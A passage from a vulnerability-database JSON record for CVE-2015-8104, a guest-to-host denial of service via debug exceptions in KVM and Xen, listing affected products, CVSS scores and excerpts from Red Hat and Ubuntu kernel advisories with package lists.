        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.86"
      },
      {
        "model": "xenserver",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.0"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.18"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "3.1.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.37"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.54"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.2"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.60"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "3.3.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.49"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.9"
      },
      {
        "model": "northstar controller application service pack",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "2.1.01"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.19.3"
      },
      {
        "model": "junos space 14.1r1",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.20"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.6"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "3.4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.58"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.0.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.72"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "4.2.1"
      },
      {
        "model": "xenserver",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "6.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.81"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.37"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.60"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0"
      },
      {
        "model": "windows for x64-based systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "100"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "3.3"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "xenserver update",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "5.02"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.1"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.3.8"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.17"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "3.2.1"
      },
      {
        "model": "junos space",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "1.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.20"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.19"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.28"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.3.7"
      },
      {
        "model": "xenserver",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "6.5"
      },
      {
        "model": "xenserver update1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "5.5"
      },
      {
        "model": "linux ia-32",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.1"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.69"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.45"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.42"
      },
      {
        "model": "northstar controller application",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "2.1.0"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "4.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8.6"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xen",
        "version": "4.1.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.36"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.98"
      },
      {
        "model": "junos space",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "11.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.17.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.1"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.2.35"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.3.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.6"
      },
      {
        "model": "xenserver update",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "5.03"
      },
      {
        "model": "vm server for",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "x863.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.7"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "77524"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-005936"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-8104"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:xen:xen:4.3.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:xen:xen:4.6.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:xen:xen:4.3.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:xen:xen:4.6.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:xen:xen:4.3.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:xen:xen:4.5.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:xen:xen:4.4.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:xen:xen:4.4.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:xen:xen:4.6.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:xen:xen:4.6.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:xen:xen:4.3.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:xen:xen:4.5.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:xen:xen:4.4.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:xen:xen:4.3.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:xen:xen:4.5.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:xen:xen:4.4.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:xen:xen:4.6.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:oracle:solaris:11.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:oracle:vm_virtualbox:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "4.0.34",
                "versionStartIncluding": "4.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:oracle:vm_virtualbox:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "4.1.42",
                "versionStartIncluding": "4.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:oracle:vm_virtualbox:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "4.2.34",
                "versionStartIncluding": "4.2.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:oracle:vm_virtualbox:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "4.3.35",
                "versionStartIncluding": "4.3.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:oracle:vm_virtualbox:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "5.0.13",
                "versionStartIncluding": "5.0.0",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "4.2.3",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:lts:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:15.04:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2015-8104"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Ubuntu",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "134906"
      },
      {
        "db": "PACKETSTORM",
        "id": "134912"
      },
      {
        "db": "PACKETSTORM",
        "id": "134909"
      },
      {
        "db": "PACKETSTORM",
        "id": "134940"
      }
    ],
    "trust": 0.4
  },
  "cve": "CVE-2015-8104",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "MEDIUM",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 4.7,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.4,
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:M/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Medium",
            "accessVector": "Local",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 4.7,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2015-8104",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:L/AC:M/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2015-8104",
            "trust": 1.8,
            "value": "MEDIUM"
          },
          {
            "author": "VULMON",
            "id": "CVE-2015-8104",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2015-8104"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-005936"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-8104"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The KVM subsystem in the Linux kernel through 4.2.6, and Xen 4.3.x through 4.6.x, allows guest OS users to cause a denial of service (host OS panic or hang) by triggering many #DB (aka Debug) exceptions, related to svm.c. Linux Kernel is prone to a denial-of-service vulnerability. \nAn attacker with a guest account can exploit this issue to cause an  infinite loop in the host, denying service to legitimate users. \n\n* A flaw was found in the way the Linux kernel\u0027s file system implementation\nhandled rename operations in which the source was inside and the\ndestination was outside of a bind mount. (CVE-2015-7613,\nImportant)\n\n* It was found that the Linux kernel\u0027s keys subsystem did not correctly\ngarbage collect uninstantiated keyrings. for reporting the\nCVE-2015-5307 issue. \n\nThis update also fixes the following bugs:\n\n* Previously, Human Interface Device (HID) ran a report on an unaligned\nbuffer, which could cause a page fault interrupt and an oops when the end\nof the report was read. This update fixes this bug by padding the end of\nthe report with extra bytes, so the reading of the report never crosses a\npage boundary. As a result, a page fault and subsequent oops no longer\noccur. (BZ#1268203)\n\n* The NFS client was previously failing to detect a directory loop for some\nNFS server directory structures. This failure could cause NFS inodes to\nremain referenced after attempting to unmount the file system, leading to a\nkernel crash. Loop checks have been added to VFS, which effectively\nprevents this problem from occurring. (BZ#1272858)\n\n* Due to a race whereby the nfs_wb_pages_cancel() and\nnfs_commit_release_pages() calls both removed a request from the nfs_inode\nstruct type, the kernel panicked with negative nfs_inode.npages count. \nThe provided upstream patch performs the required serialization by holding\nthe inode i_lock over the check of PagePrivate and locking the request,\nthus preventing the race and kernel panic from occurring. (BZ#1273721)\n\n* Due to incorrect URB_ISO_ASAP semantics, playing an audio file using a\nUSB sound card could previously fail for some hardware configurations. \nThis update fixes the bug, and playing audio from a USB sound card now\nworks as expected. (BZ#1273916)\n\n* Inside hugetlb, region data structures were protected by a combination of\na memory map semaphore and a single hugetlb instance mutex. However, a\npage-fault scalability improvement backported to the kernel on previous\nreleases removed the single hugetlb instance mutex and introduced a new\nmutex table, making the locking combination insufficient, leading to\npossible race windows that could cause corruption and undefined behavior. \nThis update fixes the problem by introducing a required spinlock to the\nregion tracking functions for proper serialization. The problem only\naffects software using huge pages through hugetlb interface. 6.2) - x86_64\n\n3. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n                   Red Hat Security Advisory\n\nSynopsis:          Important: kernel security, bug fix, and enhancement update\nAdvisory ID:       RHSA-2016:0103-01\nProduct:           Red Hat Enterprise Linux\nAdvisory URL:      https://rhn.redhat.com/errata/RHSA-2016-0103.html\nIssue date:        2016-02-02\nCVE Names:         CVE-2015-8104 CVE-2016-0728 CVE-2016-0774 \n=====================================================================\n\n1. Summary:\n\nUpdated kernel packages that fix three security issues, multiple bugs, and\none enhancement are now available for Red Hat Enterprise Linux 7.1 Extended\nUpdate Support. \n\nRed Hat Product Security has rated this update as having Important security\nimpact. Common Vulnerability Scoring System (CVSS) base scores, which give\ndetailed severity ratings, are available for each vulnerability from the\nCVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux ComputeNode EUS (v. 7.1) - noarch, x86_64\nRed Hat Enterprise Linux ComputeNode Optional EUS (v. 7.1) - x86_64\nRed Hat Enterprise Linux Server EUS (v. 7.1) - noarch, ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional EUS (v. 7.1) - ppc64, ppc64le, s390x, x86_64\n\n3. \n\n* It was found that the x86 ISA (Instruction Set Architecture) is prone to\na denial of service attack inside a virtualized environment in the form of\nan infinite loop in the microcode due to the way (sequential) delivering of\nbenign exceptions such as #DB (debug exception) is handled. A privileged\nuser inside a guest could use this flaw to create denial of service\nconditions on the host kernel. (CVE-2015-8104, Important)\n\n* A use-after-free flaw was found in the way the Linux kernel\u0027s key\nmanagement subsystem handled keyring object reference counting in certain\nerror path of the join_session_keyring() function. A local, unprivileged\nuser could use this flaw to escalate their privileges on the system. \n(CVE-2016-0728, Important)\n\n* It was found that the fix for CVE-2015-1805 incorrectly kept buffer\noffset and buffer length in sync on a failed atomic read, potentially\nresulting in a pipe buffer state corruption. A local, unprivileged user\ncould use this flaw to crash the system or leak kernel memory to user\nspace. (CVE-2016-0774, Moderate)\n\nRed Hat would like to thank the Perception Point research team for\nreporting the CVE-2016-0728 issue. The security impact of the CVE-2016-0774\nissue was discovered by Red Hat. \n\nBug fixes:\n\n* NMI watchdog of guests using legacy LVT0-based NMI delivery did not work\nwith APICv. Now, NMI works with LVT0 regardless of APICv. (BZ#1244726)\n\n* Parallel file-extending direct I/O writes could previously race to update\nthe size of the file. If they executed out-of-order, the file size could\nmove backwards and push a previously completed write beyond the end of the\nfile, causing it to be lost. (BZ#1258942)\n\n* The GHES NMI handler had a global spin lock that significantly increased\nthe latency of each perf sample collection. This update simplifies locking\ninside the handler. (BZ#1280200)\n\n* Sometimes, iptables rules are updated along with ip rules, and routes are\nreloaded. Previously, skb-\u003esk was mistakenly attached to some IPv6\nforwarding traffic packets, which could cause kernel panic. Now, such\npackets are checked and not processed. (BZ#1281700)\n\n* The NUMA node was not reported for PCI adapters, which affected every\nPOWER system deployed with Red Hat Enterprise Linux 7 and caused\nsignificant decrease in the system performance. (BZ#1283525)\n\n* Processing packets with a lot of different IPv6 source addresses caused\nthe kernel to return warnings concerning soft-lockups due to high lock\ncontention and latency increase. (BZ#1285369)\n\n* Running edge triggered interrupts with an ack notifier when\nsimultaneously reconfiguring the Intel I/O IOAPIC did not work correctly,\nso EOI in the interrupt did not cause a VM to exit if APICv was enabled. \nConsequently, the VM sometimes became unresponsive. (BZ#1287001)\n\n* Block device readahead was artificially limited, so the read performance\nwas poor, especially on RAID devices. Now, per-device readahead limits are\nused for each device, which has improved read performance. (BZ#1287548)\n\n* Identical expectations could not be tracked simultaneously even if they\nresided in different connection tracking zones. Now, an expectation insert\nattempt is rejected only if the zone is also identical. (BZ#1290093)\n\n* The storvsc kernel driver for Microsoft Hyper-V storage was setting\nincorrect SRB flags, and Red Hat Enterprise Linux 7 guests running on\nMicrosoft Hyper-V were experiencing slow I/O as well as I/O failures when\nthey were connected to a virtual SAN. Now, SRB flags are set correctly. \n(BZ#1290095)\n\n* When a NUMA system with no memory in node 0 was used, the system\nterminated unexpectedly during boot or when using OpenVSwitch. Now, the\nkernel tries to allocate memory from other nodes when node 0 is not\npresent. (BZ#1300950)\n\nEnhancement:\n\n* IPsec has been updated to provide many fixes and some enhancements. \nOf particular note is the ability to match on outgoing interfaces. \n(BZ#1287407)\n\n4. Solution:\n\nAll kernel users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues and add this\nenhancement. The system must be rebooted for this update to take effect. \n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1278496 - CVE-2015-8104 virt: guest to host DoS by triggering an infinite loop in microcode via #DB exception\n1297475 - CVE-2016-0728 kernel: Possible use-after-free vulnerability in keyring facility\n1303961 - CVE-2016-0774 kernel: pipe buffer state corruption after unsuccessful atomic read from pipe\n\n6. Package List:\n\nRed Hat Enterprise Linux ComputeNode EUS (v. 7.1):\n\nSource:\nkernel-3.10.0-229.26.2.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-229.26.2.el7.noarch.rpm\nkernel-doc-3.10.0-229.26.2.el7.noarch.rpm\n\nx86_64:\nkernel-3.10.0-229.26.2.el7.x86_64.rpm\nkernel-debug-3.10.0-229.26.2.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-229.26.2.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-229.26.2.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-229.26.2.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-229.26.2.el7.x86_64.rpm\nkernel-devel-3.10.0-229.26.2.el7.x86_64.rpm\nkernel-headers-3.10.0-229.26.2.el7.x86_64.rpm\nkernel-tools-3.10.0-229.26.2.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-229.26.2.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-229.26.2.el7.x86_64.rpm\nperf-3.10.0-229.26.2.el7.x86_64.rpm\nperf-debuginfo-3.10.0-229.26.2.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-229.26.2.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional EUS (v. 7.1):\n\nx86_64:\nkernel-debug-debuginfo-3.10.0-229.26.2.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-229.26.2.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-229.26.2.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-229.26.2.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-229.26.2.el7.x86_64.rpm\nperf-debuginfo-3.10.0-229.26.2.el7.x86_64.rpm\npython-perf-3.10.0-229.26.2.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-229.26.2.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server EUS (v. 